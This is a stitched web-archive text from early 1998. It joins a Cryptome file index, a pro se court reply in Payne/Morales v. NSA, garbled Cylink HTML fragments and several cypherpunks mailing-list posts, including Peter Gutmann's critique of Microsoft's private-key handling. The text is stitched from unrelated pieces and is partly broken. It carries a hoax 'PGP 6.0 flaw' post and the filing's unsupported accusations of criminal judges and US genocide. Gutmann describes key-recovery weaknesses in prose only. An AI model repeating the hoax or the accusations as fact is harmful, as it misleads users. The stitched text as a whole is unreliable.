pd98-10.htm        Prez OKs China's Nuclear Controls                 January 16, 1998
tcryptol           Theory of Cryptography Library (offsite)          January 16, 1998
cn011698.htm       Crypto News                                       January 16, 1998
nsasuit8.htm       USA/NSA Responds to Payne/Morales Motion          Janaury 16, 1998
dod011698.txt      Defense Dept Secret Meets                         January 16, 1998

bxa011398.txt      Materials Advisory Meet                           January 15, 1998
crypto-kong.htm    Announcing Crypto Kong                            January 15, 1998
occ-dstc.htm       OCC OKs CA as Authorized Banking Activity         January 14, 1998
aes-980820         Advanced Encryption Standard Conference (offsite) January 14, 1998
ustr010898.txt     Update: Telecommunications Trade Agreements       January 14, 1998

rc2.htm            Rivest Describes RC2 Encryption Algorithm         January 13, 1998
fc011398.txt       FinCEN Regulates Card Clubs                       January 13, 1998
ta011298.txt       Key Management Infrastructure Meet                January 12, 1998
nist011298.txt     Transmission-Electron Microscopy Meet             January 12, 1998
doa011298.txt      Army Hazard Containment Invention                 January 12, 1998

gps-jam.htm        GPS Jamming                                       January 11, 1998
arthur.htm         The Force of An Idea: Theory of USA v. Microsoft  January 10, 1998
RSA-stego.htm      Batch RSA for Stego Data                          January 9, 1998
batch-DSA.htm      Batch DSA                                         January 9, 1998
cell-track.htm     Update 2: Mobile Cell Phone Surveillance          January 9, 1998

fiat-rsa.htm       Fiat's Batch RSA                                  January 9, 1998
aes010798.htm      Update: Advanced Encryption Standard              January 9, 1998
doj010998.txt      RFC: USA v. IBM/STK Antitrust Suit                January 9, 1998
bmd010898.txt      Ballistic Missile Defense Secret Meet             January 9, 1998
nih010898.txt      Commercialization of Medical Data                 January 9, 1998

fas-pde            Prez Directives/Executive Orders (offsite)        January 7, 1998
ussc-ecopy.htm     Sentencing for Electronic Copyright Violations    January 6, 1998
ussc010698.txt     RFC: US Sentencing Guidelines (254K)              January 6, 1997
mercier.htm        Terrorists, WMD, and the US Army Reserve          January 6, 1998
terror-rnd.htm     US Counterterrorism R&D Program                   January 6, 1998

belet              Bob East Letter on AP/Jim Bell/IRS (offsite)      January 6, 1998
pitfalls           Schneier: Security Pitfalls in Crypto (offsite)   January 5, 1998
dsb010598.txt      Defense Science Board Secret Meets                January 5, 1998
ntia010598.txt     Funds for Public Telecommunications               January 5, 1998
cn010598.txt       Electronic Surveillance News                      January 5, 1998

csda.htm           Cypherpunks Smartcard Developer Association       January 4, 1998
aimd-98-21.htm     Executive Guide: Info Security Management (139K)  January 3, 1998
blast-mono.htm     Blast Resistant Doors Monograph                   January 3, 1998
tempest-door.htm   Electromagnetic Shielding/TEMPEST Door            January 3, 1998
ehj.htm            Banned Basque Video: Democratic Alternative       January 3, 1998


fda010298.htm      Policy for External Penile Rigidity Devices       January 2, 1998
doe010298.htm      Defense Nuclear Facilities Safety Plan            January 2, 1998
dos010298.txt      Meet on Global Communications and Info Policy     January 2, 1998
doa010298.txt      Army Science Board Meet                           January 2, 1998

_______________________________________________________________________________________







  
    
      
	
	    Cryptomb 2
	  
	  
	  June-December 1997
	  
	    
	  
	   Cryptomb
	  1
	  
	  To May 31 1997
      
    
  
  
  
  
    
    
  
  
  
  
  
  
  (site
  stats)
  
  
    
      
	
	    DoE: Pay Bill
	  Payne  
      
      
	
	  DoJ: Free Jim Bell
      
    
  


Title: Payne/Morales vs. NSA: Reply to Defendant's Response






23 January 1998
Source: William H. Payne

See related documents:
http://jya.com/whpfiles.htm

  
	
FILED
UNITED STATES DISTRICT COURT
DISTRICT OF NEW MEXICO
98 JAN 20 AM11:26
ROBERT M. MARSH
CLERK/ALBUQUERQUE


            UNITED STATES DISTRICT COURT
           FOR THE DISTRICT OF NEW MEXICO


William H. Payne        	   	    )
Arthur R. Morales                           )
                                            )
                Plaintiffs,                 )
                                            )
v                                           )	CIV NO 97 0266 
					    )	SC/DJS
			                    )
Lieutenant General Kenneth A. Minihan, USAF )
Director, National Security Agency	    )
National Security Agency		    )
                                            )
                Defendant                   )


  REPLY TO DEFENDANT'S RESPONSE TO PLAINTIFFS' MOTION FOR 
  SUMMARY JUDGMENT BASED ON EVIDENCE FROM ADMISSIONS


1  COMES NOW plaintiffs Payne [Payne] and Morales [Morales] 
[Plaintiffs], pro se litigants to exercise their rights 
guaranteed under the Constitution, Rules of Civil  Procedure, 
and Local Civil Rules to respond to Defendant's MOTION filed
on 98 JAN-5 within the 14 days allowed by local rule 7.3(b)(4).


2  US Attorney Mitchell [Mitchell]  writes,

  Counsel for Defendant was not served with copies of any of  
  said Requests for Admissions until sometime after the
  individuals had been served.2

Mitchell WAS SERVED

  PLAINTIFFS' FIRST SET OF REQUEST FOR ADMISSION  TO  
  NSA DIRECTOR KENNETH MINIHAN 

  I HEREBY CERTIFY that a copy of the foregoing request for   
  admissions was mailed to Jan Elizabeth Mitchell, Assistant US 
  Attorney, 525 Silver SW, ABQ, NM 87102 this  Monday November 
  3, 1997. 

Michell was not served with any other admissions since
Mitchell is not representing others.

Plaintiffs' served Defendant Minihan properly.  And Minihan
failed to respond to Minihan's admissions within the time


                                 1



allotted by law.


3 US Attorney Mitchell writes,

  As grounds for the Motion and Memorandum, Defendant
  argued that Plaintiffs had blatantly disregarded this Court's   
  Order pertaining to the conduct of discovery and the deadline 
  for discovery in this Freedom of Information Act action.

Judges Svet and Campos willfully violated Plaintiffs' right
to Discovery.  And thereby earned criminal complaint affidavits
filed with judge Scalia of the Supreme Court.


4 US Attorney Mitchell writes,

  In Defendant's Motion and Memorandum, Counsel for Defendant 
  also objected to Plaintiffs' sua sponte decision to
  modify the Court's June 11 Order to reflect the delay of the
  Court's October 7 Order and the establishment, without leave   
  of this Court, of new deadlines for discovery, motions   
  practice, and the filing of the PreTrial Order. (Motion and   
  Memorandum  9, at 4.)

Judge Svet and Campos attempt to deny Plaintiffs' right to 
Discovery, again, earned Svet and Campos criminal complaint
affidavits.

Plaintiffs exercise their right under the Federal Rules of 
Civil Procedure and the Constitution to conduct Discovery
WITHOUT LEAVE OF COURT!


5 US Attorney Mitchell writes,

   By their own request, Plaintiffs sought to stay a ruling on 
  the Defendant's Motion and Memorandum. Absent any ruling on 
  either the Motion and Memorandum or Plaintiffs' Response,
  Defendant Minihan, employees of NSA, and employees of 
  Sandia National Laboratory, were not obligated to respond to 
  the Requests for Admissions as provided by Fed.R.Civ.P. 36.3 
  For Plaintiffs to now assert in their "Motion for Summary 
  Judgment On Based On Evidence From Admissions" that because   
  the individuals have not responded to the Requests for 
  Admissions they are deemed admitted, flies in the face of   
  their own prayer to this Court to stay a ruling on the 
  Defendant's Motion to strike the Requests for Admissions until 
  the Supreme Court takes action.


                                 2



Plaintiffs' have REPEATEDLY asked judge Svet and Campos to
disqualify themselves from any rulings on this case because
Campos and Svet do NOT obey the Federal Rules of Civil 
Procedure.

  Replace judges Svet and Campos because these judges
  have demonstrated, IN WRITING, they do not follow the 
  Federal Rules of Civil Procedure.

Plaintiffs' pleas are directed a[t] replacement judge[s].  Not
Svet and Campos.

Therefore, Svet and Campos' failure to remove themselves does 
not stop the legal process. 

Mitchell cites NO law to support her claim that time 
constraints imposed under Fed.R.Civ.P. 36.3 are inapplicable
as a result of Svet's and Campos' failure to remove themselves.


6 US Attorney Mitchell writes,

  Defendant requests that this Court either rule upon
  Defendant's Motion and Memorandum granting the request to   
  strike the Requests for Admissions, or grant Plaintiffs' 
  request to stay this action pending the issuance of the order 
  sought by Plaintiffs in another forum. Should this Court deny 
  Defendant's Motion and Memorandum, Defendant respectfully 
  requests that the individuals to whom Requests for Admissions 
  are appropriate in this action be given the thirty days to 
  respond to said admissions as provided by the Federal Rules of 
  Civil Procedure.

REPLACEMENT JUDGES of the Court should realize the outcome
of the lawsuit has attained international interest as a result
of the

  1  bungled NSA spy sting on Iran 
  2  US government agencies NSA, NIST, and the FBI's
     attempt to control cryptography.

Mitchell's 
  
  DEFENDANT'S RESPONSE TO PLAINTIFFS' MOTION FOR 
  SUMMARY JUDGMENT BASED ON EVIDENCE FROM ADMISSIONS

was posted on Internet at jya.com, click cryptome


                                 3



  nsasuit8.htm  USA/NSA Responds to Payne/Morales Motion            
                January 16, 1998

Importance of this posting is summed-up in the Toronto Sun, 
Jan. 11, 1998

  US, Iran Need Each Other 
 
  by Eric Margolis 
 
  Iran launched a surprise charm offensive last week, 
  throwing Washington into serious confusion.  

  In a lengthy interview on CNN, Iran's new president, Mohammad   
  Khatami, skillfully analyzed the bitter relations between the   
  two nations and cautiously extended an olive branch to 
  Washington, calling for an end to their 19-year cold war. 
 
  Khatami's diplomatic ju-jitsu flummoxed the Clinton   
  administration, which was busy trying to rally international 
  support against Tehran - and to overthrow Iran's elected 
  government.  
 
  Both capitals are split over the question of relations.  

  In Washington, the military establishment and conservative   
  Republicans have inflated Iran into a bogeyman to 
  justify military budgets and keep U.S. forces in the Mideast.  
  ...

  America incited Iraq to invade Iran in 1980. They did this to 
  crush the Islamic revolution, then provided massive war aid to 
  Saddam Hussein. Half a million Iranians died.  
 
The US got caught involved in genocide.  Using high tech.
This is one subject of this lawsuit.

Albuquerque Journal Tuesday 1/13/98 carried the editorial.
  
  Khatami Move Is Profile in Courage
  Richard Reeves
  Syndicated Columnist

  LOS ANGELES -  If an American leader had done what
  Iranian President Mohammed Khatami did last Wednesday,
  it would have been hailed as a profile in courage. ...

  Miscalculation!  We armed and pampered Saddam Hussein in
  the hope that Iraq would destroy Iran.  Now that's policy and
  behavior to think about. Here is something to think about: If
  Presidents Eisenhower and Kennedy had pursued any kind of
  sensible policy toward Cuba and Fidel Castro - opposed to


                                 4



  the policy of trying to assassinate him - there never would 
  have been a Cuban missile crisis.

    I think Iranians have financed and encouraged terrorism
  against the interests of the United States and Israel.  I   
  would not be surprised at all if something like proof emerges 
  soon, perhaps anonymously, from the CIA and other government 
  agencies, where many officials have built their careers on 
  sanctioning and isolating Iran, to try to straighten the 
  backbones of the president and people of the United States.

    If they succeed, America fails.  What would be more 
  effective in closing down Iranian terrorism?  More hostility, 
  sanctions and charges?  Or beginning the process toward more 
  normal relations with a country positioned and born to be   
  great? ...

Clearly genocide fits into [missing text]

Now that's policy and behavior to think about.

The wired world is watching what this Court, hopefully
minus judges Svet and Campos, will do.

What is there to be?  A series of possibly unfortunate
events?  

Or does this Court order release the lawfully requested 
documents to help settle this American tragedy?


WHEREFORE.

7 Have replacement judges of this Court DENY Mitchell's

  Plaintiffs requested a stay. Absent a ruling from
  this Court denying their request, they cannot proceed to 
  assert that the Requests for Admissions are deemed admitted. 
  Accordingly, Plaintiffs' "Motion For Summary Judgment On Based 
  On Evidence From Admissions" must be denied.

for reason that Mitchell's request to subvert both the Discovery
processes and its time limits have no basis in law.  And appears 
to plead to judges who do not obey the Federal Rules of Civil
Procedure.

[No 8]

9  IMMEDIATELY ORDER Defendant to release the requested 
documents in the interest of national safety so that this 


                                 5



matter can be settled. 

Aggrieved victims of  US genocide are reading these pleadings.

                    Respectfully submitted, 
 
                    [Signature] 
                    _________________________ 
                    William H. Payne             	   	     
                    13015 Calle de Sandias NE          	     
                    Albuquerque, NM 87111              	     
 
                    [Signature]
                    _________________________				 
                    Arthur R. Morales                            
                    1024 Los Arboles NW                         
                    Albuquerque, NM 87107                        
 
                    Pro se litigants 
 
 
CERTIFICATE OF SERVICE 
 
I HEREBY CERTIFY that a copy of the foregoing memorandum
was mailed to Lieutenant General Kenneth A. Minihan, USAF, 
Director,  National Security Agency, National Security Agency, 
9800 Savage Road, Fort George G. Meade, MD 20755-6000 
and hand delivered to  John J. Kelly, US Attorney, 525 Silver 
SW, ABQ, NM 87102 this  Tuesday January 20, 1997. 


                    [Arthur R. Morales signature]





                                  6


[End]






Title: Cylink Corporation





                               

!
!
!
!
!
<IMG ALT="Employment" SRC="http://www.cylink.com/external/objects.nsf/reference/YTEmployment/$file/YTEmployment.gif" width!
!
!
!
!
=86 height=22 BORDER="0"><IMG ALT="Cylink Corporation News" SRC="http://www.cylink.com/external/obje!
!
!
!
!
cts.nsf/reference/HCylink/$file/HCylink.jpg" width=149 height=22 BORDER=0>Learn more about Algorithmic Research<IMG ALT="PrivateWire FAQ" SRC="http://www.cylink.com/external/objects.nsf/reference/PWFAQ/$!
!
!
!
!
file/PWFAQ.gif" width=90 height=30 BORDER=0>Cylink's Critical Weapon in the Drug WarBank Leumi Selects PrivateWire Cylink Opens Service Centers in India and ChinaCylink Extends Service to Remote Areas<A HREF="http://www.cylink.com/external/pressrm.nsf/ShortTitl!
!
!
!
!
e/RUS?OpenDocument">Cylink Gains RUS Acceptance for Airlink T1 Product 

From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lutz@taranis.iks-jena.de (Lutz Donnerhacke)
Date: Wed, 4 Feb 1998 04:08:28 +0800
To: cypherpunks@Algebra.COM
Subject: Re: A fatal flaw in PGP 6.0
In-Reply-To: <e733397cdc30125650f2bba5ea2fbb3b@anon.efga.org>
Message-ID: <slrn6detfi.2f0.lutz@taranis.iks-jena.de>
MIME-Version: 1.0
Content-Type: text/plain



* Anonymous wrote:
>>FATAL ERROR
>>
>>Unable to find key "ghost@nsa.gov"
>>Please obtain a new key from Network associates.

>Anyone like to confirm this?

No the key requested is 'snoop@microsoft.com'.

But the ROT13 encoding is true even for PGP5. If you move or rename the
randseed.bin to an other location (i.E. to install pgp2.6.3(i)n and pgp5
simultanusly) the file will be modified, but all encrypted messages have the
same session key.

On the other hand pgp5 does not confirm the OpenPGP draft. A converter can
be found at ftp://ftp.iks-jena.de/pub/mitarb/lutz/crypt/software/pgp/OpenPGP/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 4 Feb 1998 13:26:42 +0800
To: Simon Fraser <simonf@uk.uu.net>
Subject: Re: Spammers
In-Reply-To: <v03102807b0fcd856e294@[207.79.65.77]>
Message-ID: <3.0.5.32.19980203203912.007c0e10@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 02:37 PM 2/3/98 +0000, Simon Fraser wrote:
>
>On Tue, 3 Feb 1998, Chip Mefford wrote:
>
>> Wouldn't it be nice to hold uu.net culpable for all their spamming ways.
They
>> want to own the internet, let them hang for it.
>
>http://www.us.uu.net/support/usepolicy/
>It would be nice to differentiate between the spammers themselves and the
>ISP they use. 
>
>
>Simon.

Yes. Otherwise an ISP loses common-carrier status and is thus
responsible for the content of its traffic.

Blame the junk-faxers, not the telcos.  



David Honig 			honig@alum.mit.edu
---------------------------------------------------
Is Monica Lewinsky endorsing kneepads for Nike yet?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 4 Feb 1998 13:36:05 +0800
To: cypherpunks@toad.com
Subject: potus manipulation for fun and profit
Message-ID: <3.0.5.32.19980203211801.007ef3c0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain




Given the Head of State's alleged affinitity for 
"covert personal operations", consider the potential
for manipulating him by any three-letter-agency skilled
in surveillance.  E.g., getting the Clinton
administration behind Clipper, supporting our man Freeh, etc.

There are advantages to having a POTUS who's a security
risk, after all :-<   


-Gedanken memo, no such agency.

 




David Honig 			honig@alum.mit.edu
---------------------------------------------------
Is Monica Lewinsky endorsing kneepads for Nike yet?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 4 Feb 1998 04:35:08 +0800
To: cypherpunks@cyberpass.net
Subject: A fatal flaw in PGP 6.0
Message-ID: <199802032021.VAA18446@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



This was posted anonymously to alt.security.pgp last night

>Subject: PGP 6.0 alpha3
>Date: 3 Feb 1998 00:15:56 +0100
>
>Anyone else having problems with the alpha of PGP 6.0?  When I try to
encrypt e-mail I get an error:
>
>FATAL ERROR
>
>Unable to find key "ghost@nsa.gov"
>Please obtain a new key from Network associates.
>
>
>Other than that it's pretty slick!  I'm not sure I'd have the default
cypher as ROT-13 though!  I changed mine to RC-2 255-bit.
>
>Anyone else?

Anyone like to confirm this?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Wed, 4 Feb 1998 10:57:17 +0800
To: Tim May <tcmay@got.net>
Subject: Re: the best justice money can buy --Lessig suspended
In-Reply-To: <v03102802b0fd25414459@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980203212056.334A-100000@king>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 3 Feb 1998, Tim May wrote:

> 
> (I've left out the PowerPC, as it appears now to be limited solely to the
> Macintosh market...even IBM and Motorola appear to have acknowledged its
> failure.)

Unless I've missed some absolutely major announcement, IBM is betting on
the PowerPC in all their servers.  Well, at least in their RS/6000 and
AS/400, which is pretty much their entire high-end market.

The PowerPC never had a serious entry into the desktop market anywhere but
the Macintosh to my knowledge.


Ryan Anderson - Alpha Geek
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan <alan@clueserver.org>
Date: Wed, 4 Feb 1998 13:02:28 +0800
To: Eric Cordian <emc@wire.insync.net>
Subject: Re: The War on Some Debts
In-Reply-To: <199802031640.KAA18766@wire.insync.net>
Message-ID: <Pine.LNX.3.96.980203215746.589B-100000@www.ctrl-alt-del.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 3 Feb 1998, Eric Cordian wrote:

> In a further blatant erosion of Constitutional rights, the California
> Supreme Court has ruled that a person owing child support who fails to
> seek or accept work may be jailed and fined for contempt of court, and
> that this does not violate any Constitutional bans on involuntary
> servitude or imprisonment for debt. 
>  
> This reverses nearly a century of contrary rulings.  Look for this
> "improved" interpretation to be expanded to other kinds of debts and
> judgments as well, as soon as massive public acceptance of it for the
> carefully picked child support issue is engineered. 

Expected targets:

-- Student loans  (There are already a number of nasty collection methods
made legal to "crack down" on those who are behind in their payments.)

-- State and local taxes 

-- Garnishments of wages

> The credit card companies are no doubt carefully analyzing this decision
> as we speak. 

As well as anyone else in the collections business.

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Wed, 4 Feb 1998 11:27:52 +0800
To: "cypherpunks" <cypherpunks@cyberpass.net>
Subject: Re: the best justice money can buy --Lessig suspended
Message-ID: <199802040320.WAA19065@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 2/3/98 9:45 PM, Ryan Anderson (ryan@michonline.com)  passed this 
wisdom:

>On Tue, 3 Feb 1998, Tim May wrote:
>
>> 
>> (I've left out the PowerPC, as it appears now to be limited solely
>> to the Macintosh market...even IBM and Motorola appear to have
>> acknowledged its failure.)
>
>Unless I've missed some absolutely major announcement, IBM is 
>betting on the PowerPC in all their servers. Well, at least in 
>their RS/6000 and AS/400, which is pretty much their entire 
>high-end market.
>
>The PowerPC never had a serious entry into the desktop market 
>anywhere but the Macintosh to my 
>knowledge.

 ... and while Intel is not so quietly making noises about the soon to be 
available 333MHz Pentium IIs, Motorola quietly announced 400/433 MHz PPC 
chips two weeks earlier.


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  "Fate favors the prepared mind." (from "Under Siege 3")






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 4 Feb 1998 11:30:44 +0800
To: cypherpunks@toad.com
Subject: Whoa: British SmartCard rollout
Message-ID: <199802040323.WAA16673@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: bill payne <billp@nmol.com>
   >   To: webmaster@cylink.com
   >   CC: federico pena <" Federico.F.Pena"@hq.doe.gov>, jy@jya.com,
   >           john gilmore <gnu@toad.com>, j orlin grabbe <kalliste@aci.net>,
   >           cypherpunks@toad.com
   >   Subject: Jim Omura

   >   <B>cn010598.txt
       Electronic Surveillance News                      January 5, 1998</B>

2 January 1998, Newsbytes:

 British Govt Announces Smart Card Plans for UK Citizens 

 London, England: Amid the quiet of the Christmas and New Year break, the British 
 government revealed plans for a "citizen's smart card" that will streamline the 
 interfacing of British people with their government. 

 In plain English, that translates to a smart card that can be used to allow people to
 pay all of their taxes, including income tax, national insurance, and local taxes, as
 well as apply for passports, state benefits, and other forms of government welfare.

 The idea behind the smart card, according to Peter Kilfoyle, the British public
 services minister, is that people will be able to use the card to identify themselves
 to the various government computers, all of which will be interlinked with each
 other. 

 Kilfoyle claims that there are "huge potential savings" to be had from the
 introduction of the smart card, although he revealed that possessing a card will be
 voluntary. When questioned further on this, he admitted, however, that people
 could find it difficult to operate in the future without such a card. 

Initially, the citizen's smart card will rely on traditional PIN protection systems to
 allow a person to ID themselves alongside the card to the government computer
 systems. In the longer term, and certainly within the next five years, the plan is to
 allow an individual to use a fingerprint or similar biometric system for positive
 identification. 

----

Fingerprinting everyone on the planet: those of you in CA and a handful
of other states have already been fingerprinted "so you can drive".

Police will eventually be able to stop anyone and demand to check
their fingerprints via cheap small portable scanners.

EFF/EPIC etc need to specifically target these biometric systems
as being way over the top.

Totally unnecessary.
---guy

   How did you CA cypherpunks feel about being fingerprinted?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Wed, 4 Feb 1998 13:29:11 +0800
To: cypherpunks@toad.com
Subject: RSA? ElGamal?
Message-ID: <50c47d8978815f7c5bf17e92e5e71bcc@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain




Is ElGamal secure than RSA ?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Tue, 3 Feb 1998 20:56:30 +0800
To: cypherpunks@cyberpass.net
Subject: An update on MS private key (in)security issues
Message-ID: <88650932615058@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



A fortnight ago I posted a message exposing a number of weaknesses in the way
various Microsoft security products handle users private keys.  A few days
before I was due to vanish for a security conference (where it was very
difficult to contact me), the article started getting a bit of attention.  This
is a general response which clarifies several issues relating to the original
message.

First, Russ Cooper (moderator of the NT Bugtraq mailing list) made some wildly
inaccurate claims about the article.  I've had a bit of feedback which
indicated that it wasn't even worth dignifying this stuff with a response but
I've written one anyway, at least for the original NT Bugtraq messages he
posted (the stuff he put on a web page is just more of the same).  You can find
it at http://www.cs.auckland.ac.nz/~pgut001/pubs/breakms2.txt (even if you
don't want to plough through the whole thing, you might want to read the last
two paragraphs for a giggle).

After this, Microsofts spin doctors leaped into action and posted a response to
the article.  I've replied to this one in a bit more detail, since it raises
several important issues.

Comments on Microsofts Response
-------------------------------

>Microsoft's Response to Recent Questions on the Recovery of Private Keys from
>various Microsoft Products

>[...]

>With the exception of the details about a possible PKCS-12 attack, all the
>issues raised in the recent discussions are specifically aimed at Microsoft's
>base CSPs, not at CryptoAPI.  The base CSPs are the royalty-free,
>software-based CSPs provided with Windows NT 4.0, Windows 95, and Internet
>Explorer. These attacks do not apply in general to other CryptoAPI CSPs and do
>not indicate any fundamental concerns with the security of the CryptoAPI
>architecture or applications built upon it.

This statement is mere obfuscation.  As Microsoft have said, every single
(recent) copy of Windows NT, Windows'95, and MSIE (and, presumably, other
products like IIS and Outlook, which rely on them) ship with these CSP's,
therefore every recent system comes with this security hole installed by
default.

In addition, the CryptExportKey() function is a standard CryptAPI function,
which is described by Microsoft with the text "The CryptExportKey function is
used to export cryptographic keys out of a cryptographic service provider in a
secure manner" (obviously some new use of the term "secure" with which I wasn't
previously familiar).  There's nothing in there that says "Only the Microsoft
CSP's support this" (some may not support it, but by Microsofts own admission
the default used on any recent system does indeed exhibit this flaw).

>Microsoft products do not "store" private key material using PKCS-12, contrary
>to recent descriptions on the Internet.

I was unfortunately somewhat unclear in my article, I've fixed up the online
version at http://www.cs.auckland.ac.nz/~pgut001/pubs/breakms.txt.  To
summarise, if you want to get at an exported key stored on disk, you can use
the pre-4.0 key file/PKCS #12 key file flaws.  If you want to get at the
current users key, you can use the CryptExportKey() flaw.

>The example of breaking a PKCS-12 data blob, which was given in discussion on
>the Internet, is not an attack on the "weak" cryptography of PKCS-12. Rather,
>it is simply a dictionary attack (long known and well understood in
>cryptography),

This statement is accurate.  As Microsoft have said, dictionary attacks have
been known to the computer industry for a long, long time (several decades).
For example the Unix password encryption uses 25 iterations of DES to protect
users passwords from dictionary attacks (this is rather inadequate now, but was
appropriate more than two decades ago when it was introduced).

If this is a well-known flaw which the entire industry has known about for
decades, why are Microsoft's very latest "security" products so extremely
vulnerable to it?  As I mentioned in my writeup, I published an attack on the
exact format used in older MS products more than 1 1/2 years ago, but Microsoft
made no attempt to fix this problem at the time.  It wasn't until I published
the current writeup that they finally addressed it.

>One statement by the original poster argues that Microsoft managed to design a
>security format that actually makes it easier to break into the protected
>data. As stated above, a number of well respected companies were involved
>extensively in the design and review of PKCS-12 before it became a standard.

The problem is that Microsoft ignored the other companies recommendations for
increasing security.  I'll refer people back to the original writeup for
mention of the various security features which were added to PKCS #12 and
subsequently ignored by Microsoft.  PKCS #12 is just a basic modification of
PFX, which was a purely Microsoft invention, and Microsofts implementation of
PKCS #12 does indeed make it very easy to perform the attack I described (you'd
have to read my writeup for the full technical details in which I describe each
individual flaw which, as each is exploited in turn, make it progressively
easier and easier to recover a users private key).

In addition (as I mentioned in my original message), Microsoft use RC2/40 to
encrypt the private keys, which means that no matter how good a password you
choose, the default PKCS #12 format private key produced by MSIE can be
recovered in a few days with fairly modest computing power.  There already
exists a Windows screen saver which will recover RC2/40 keys for S/MIME
messages, and the prize of an RSA private key is a much higher motivating
factor than the "Hello, how are you?" typically found in an S/MIME message. As
Microsoft point out, Netscape can indeed handle RC2/40-encrypted files, however
they usually use triple DES and not RC2/40 (they encrypt the private key
components - the really valuable part of the PKCS #12 payload - with triple DES
and the other odds and ends with RC2/40).  Since Netscape also iterate the
password and MAC processing, they aren't vulnerable to the attacks which the
Microsoft software is vulnerable to, even though both are based on the same
PKCS #12 standard.

>Exploiting Internet Explorer
>
>One of the fundamental requirements to perform any possible cryptographic
>attack discussed in the recent postings is the assumption that a malicious
>entity could somehow access to data on a user's computer system, without the
>permission or knowledge of the user.  This is a large leap of faith.
>
>Users that are using Public Key Certificates today are generally sophisticated
>and savvy users,

Bwahahahahaha!

Sorry, I guess I should explain that in more precise terms.  Now I'm not trying
to claim that the average Win95 user isn't as sophisticated and savvy as
Microsoft seem to think, or that relying entirely on the sophistication of the
average Win95 user for security is a dangerous move.  However these statements
do seem to completely ignore the reality of the situation.  Let me go into the
background of the weaknesses a bit further.

When I tested the weaknesses, I asked some "guinea pig" users to send me their
exported keys, with the promise that I'd destroy the keys and not keep any
record of where the keys came from and so on.  Because of this I can't give
exact figures, however here are a few data points:

- More than half the keys (I can't remember the exact figure) were in the
  older, pre-4.x format.  This indicates that the majority of users (or at
  least of the crypto-using guinea pigs) are still running old versions of MSIE
  which contain a number of widely-publicised problems, including precisely the
  weaknesses required to run arbitrary code on the machine or read files off
  the machine.  One of the respondents commented that the key was "the key I
  use with Outlook", I'm not sure what that says about the origins of the key.
  Another key was one used with IIS for a web site which runs an online
  commerce service that processes credit-card based orders.  This must have
  been an older version of IIS since the key was in the pre-4.x format.

- When I asked two of the people why they were still using an old version, the
  responses were "It came installed with the machine when we bought it" and "It
  does what I want, so I haven't upgraded".  I expect most users of the older
  version would have a similar reason for using it.

  In a company of 20 people (some of whom participated in this test), only two
  were running 4.x.  These people are all highly competent software developers
  (presumably this includes them in the group of "sophisticated and savvy
  users" which MS were referring to), however none of the remaining 18 wanted
  to risk installing MSIE 4 because of the extent with which it messed with
  their system, possibly jeopardising their development work.  Therefore most
  of these "sophisticated and savvy users" were still running old, insecure
  versions of MSIE, and weren't going to upgrade any time soon.

- For the two remaining 4.x users in the company, both are still using
  straight, unpatched 4.0 because they considered it painful enough to download
  all of 4.0 and they didn't want to bother with an upgrade just yet.  This
  makes them vulnerable to the bug pointed out in the l0pht advisory.

- When I informed one of the guinea pigs of the recovered password, his
  response was "Now I'll have to change my login password" (the others
  generally restricted themselves to some variation of "Oops").  This comment
  confirms that users do indeed sometimes use their login password to protect
  their private keys, so that a successful attack recovers not only their
  private keys but their login password as well.

- One respondent commented that most of the code they downloaded from the net
  was unsigned, but they ran it anyway.  This is probably typical of the
  average user.

Although I've only been back for two days, I haven't yet managed to find anyone
who has applied all the latest patches and kludges to their system which makes
them immune to these problems.  This includes at least one person who has a
code signing key which could be used to sign malicious ActiveX controls.
Therefore all of the guinea pigs could in theory have their private keys
stolen.

>Attacks against Authenticode signing keys
>
>[...]
>
>However, it is extremely unlikely anyone could be successful with a simplistic
>strategy for stealing Authenticode signing keys and then using them.

See my comments about about this.  I could, right now, obtain at least one
Authenticode signing key with which I could create a malicious ActiveX control.
I'm sure that if I were serious about this I could obtain a number of others.

>Second, anyone signing code using Authenticode technology is extremely
>unlikely to leave their key material sitting on an end user machine routinely
>used for browsing the Internet.

I see no basis for this claim.  Every developer I know uses the same machine
for both code development and web browsing (in fact a number of users keep a
copy of MSIE or Netscape permantly running on their machine so that they'll
have something to do between compiles).  Microsoft's statement seems to imply
that users will be running two machines, one dedicated entirely to web browsing
and the other to code signing.  I find this extremely unlikely.

>Attacks on Encrypted Key material
>
>There is some confusion over the algorithms and methods that Microsoft uses to
